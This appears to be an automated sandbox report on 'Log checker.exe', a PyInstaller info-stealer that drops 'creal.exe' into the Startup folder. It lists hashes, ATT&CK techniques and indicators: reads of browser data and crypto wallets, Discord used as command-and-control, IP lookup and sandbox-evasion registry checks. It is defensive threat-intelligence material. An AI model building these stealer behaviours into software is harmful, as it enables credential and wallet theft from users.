78ccd648e38911593ca795723175309fa27f58cc174cd8e6ce435fb2862f69a7

Analysis

max time kernel
140s
max time network
139s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
14/05/2024, 09:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Log checker.exe
Size

16.0MB
MD5

7bbfb8d2359f13dab444803e9a0fd5e0
SHA1

bd5896b6d3e1576567db303de9c1d6ae35a86b2d
SHA256

9855b51749951297120268dcef92442bddc39c8374c2e8edbe4e80fcddc09966
SHA512

150d66304c01d000d74f550c34ba475422a028171df160962faa60391b49d59a39533aeb9a4affc4de44f3a1f2ba0e622cf1d1e92d0b6dc72c47179b387a568c
SSDEEP

393216:zlPiKyPxsHjFofQo5xHSdX30GVrSVSJ3QJIIg++462:zlKlZ6mYsx0rVrdJ3qgw62

Score

7^/10

pyinstaller spyware stealer

Malware Config

Signatures

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation	Log checker.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe	creal.exe

Executes dropped EXE 2 IoCs

pid	Process
3300	creal.exe
2324	creal.exe

Loads dropped DLL 43 IoCs

pid	Process
2324	creal.exe
2324	creal.exe
2324	creal.exe
2324	creal.exe
2324	creal.exe
2324	creal.exe
2324	creal.exe
2324	creal.exe
2324	creal.exe
2324	creal.exe
2324	creal.exe
2324	creal.exe
2324	creal.exe
2324	creal.exe
2324	creal.exe
2324	creal.exe
2324	creal.exe
2324	creal.exe
2324	creal.exe
2324	creal.exe
2324	creal.exe
2324	creal.exe
2324	creal.exe
2324	creal.exe
2324	creal.exe
2324	creal.exe
2324	creal.exe
2324	creal.exe
2324	creal.exe
2324	creal.exe
2324	creal.exe
2324	creal.exe
2324	creal.exe
2324	creal.exe
2324	creal.exe
2324	creal.exe
2324	creal.exe
2324	creal.exe
2324	creal.exe
2324	creal.exe
2324	creal.exe
2324	creal.exe
2324	creal.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 25 IoCs

Web Service

T1102

flow	ioc
48	discord.com
54	discord.com
43	discord.com
53	discord.com
36	discord.com
41	discord.com
42	discord.com
46	discord.com
55	discord.com
30	discord.com
34	discord.com
37	discord.com
45	discord.com
47	discord.com
56	discord.com
32	discord.com
33	discord.com
29	discord.com
52	discord.com
57	discord.com
31	discord.com
49	discord.com
50	discord.com
28	discord.com
44	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
2	api.ipify.org
1	api.ipify.org

Detects Pyinstaller 1 IoCs

pyinstaller

resource	yara_rule
behavioral2/files/0x000a0000000233d8-7.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe

Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery

T1057

pid	Process
4184	tasklist.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133601543873640411"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\0\MRUListEx = 00000000ffffffff	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\0\0\0\0\MRUListEx = 00000000ffffffff	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0 = 5600310000000000a8582e6112004170704461746100400009000400efbea8582e61ae58564f2e0000007ee101000000010000000000000000000000000000000cdb3f004100700070004400610074006100000016000000	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings	taskmgr.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\Mode = "1"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\FFlags = "1"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\0\0\0\0 = 8200310000000000a858e862110050726f6772616d7300006a0009000400efbea8582e61ae58604f2e00000084e10100000001000000000000000000400000000000fa6f9d00500072006f006700720061006d007300000040007300680065006c006c00330032002e0064006c006c002c002d0032003100370038003200000018000000	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\0\0\0\0	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\0\0\0\MRUListEx = 00000000ffffffff	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\0\0\0\0\0\MRUListEx = ffffffff	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 = 14001f50e04fd020ea3a6910a2d808002b30309d0000	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\0 = 5c00310000000000a858196314004d4943524f537e310000440009000400efbea8582e61ae585a4f2e00000080e10100000001000000000000000000000000000000f54908004d006900630072006f0073006f0066007400000018000000	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\0\0\0 = 8600310000000000a8583061110053544152544d7e3100006e0009000400efbea8582e61ae58604f2e00000083e101000000010000000000000000004400000000000f9d82005300740061007200740020004d0065006e007500000040007300680065006c006c00330032002e0064006c006c002c002d0032003100370038003600000018000000	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\0\0\0\0\0 = 7e00310000000000ae58594f11005374617274757000680009000400efbea8583061ae58604f2e000000dae301000000010000000000000000003e0000000000d82f22005300740061007200740075007000000040007300680065006c006c00330032002e0064006c006c002c002d0032003100370038003700000016000000	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupView = "0"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0 = 5000310000000000a8586c66100041646d696e003c0009000400efbea8582e61ae58564f2e00000073e10100000001000000000000000000000000000000fa462b00410064006d0069006e00000014000000	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\FFlags = "1092616257"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\MRUListEx = 00000000ffffffff	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\0	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\0\0 = 5600310000000000a8583261100057696e646f777300400009000400efbea8582e61ae58604f2e00000081e101000000010000000000000000000000000000008fda3f00570069006e0064006f0077007300000016000000	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0 = 7800310000000000a8582e611100557365727300640009000400efbe874f7748ae58564f2e000000c70500000000010000000000000000003a0000000000f7c54b0055007300650072007300000040007300680065006c006c00330032002e0064006c006c002c002d0032003100380031003300000014000000	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257"	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\MRUListEx = 00000000ffffffff	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\SniffedFolderType = "Generic"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByKey:PID = "0"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\MRUListEx = 00000000ffffffff	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\MRUListEx = 00000000ffffffff	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\0\0\MRUListEx = 00000000ffffffff	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\NodeSlot = "2"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\IconSize = "48"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a000000a000000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByDirection = "1"	chrome.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 = 19002f433a5c000000000000000000000000000000000000000000	chrome.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
3896	chrome.exe
3896	chrome.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2632	taskmgr.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

pid	Process
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4184	tasklist.exe
Token: SeDebugPrivilege	2632	taskmgr.exe
Token: SeSystemProfilePrivilege	2632	taskmgr.exe
Token: SeCreateGlobalPrivilege	2632	taskmgr.exe
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe
Token: SeShutdownPrivilege	3896	chrome.exe
Token: SeCreatePagefilePrivilege	3896	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
2632	taskmgr.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe
3896	chrome.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
3048	chrome.exe
3048	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3856 wrote to memory of 3300	3856	Log checker.exe	84
PID 3856 wrote to memory of 3300	3856	Log checker.exe	84
